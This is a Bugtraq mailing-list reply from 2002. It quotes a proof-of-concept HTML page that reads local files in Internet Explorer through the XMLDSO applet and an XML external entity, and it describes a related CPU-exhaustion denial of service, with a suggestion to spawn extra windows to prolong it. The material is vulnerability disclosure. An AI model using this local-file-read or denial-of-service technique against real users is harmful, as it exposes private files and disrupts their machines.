Re: Internet explorer can read local files

[Avleen Vig <lists-bugtraq () silverwraith com>]

On Sat, 17 Aug 2002, Jelmer wrote:

> <html>
> <head>
>  <base href="file:///C:/">
> </head>
> <body>
>  <applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso"
> MAYSCRIPT="true">
>   <?xml version="1.0"?>
>   <!DOCTYPE file  [
>     <!ELEMENT file (#PCDATA) >
>     <!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
>   ]>
>   <file>
>   &contents;
>   </file>
>  </applet>
>  <script language="javascript">
>   setTimeout("showIt()",2000);
>   function showIt() {
>    var jelmer = xmldso.getDocument();
>    alert(jelmer.Text);
>   }
>  </script>
> </body>
> </html>

This is also a short term 100% CPU consumtion vulnerability:
replace 'file:///C:/jelmer.txt' with the location of any executable file,
and IE will consume 100% CPU for approximately 30 seconds. During this
time, task manager (on Win2k SP2 at least) cannot start.
Closing the IE window does not fix the problem.
If it were possible to make the script not time out, this would be a
bigger problem. There's also nothign to stop you spwaning off other
windows and such to increase the length of time the user if effected.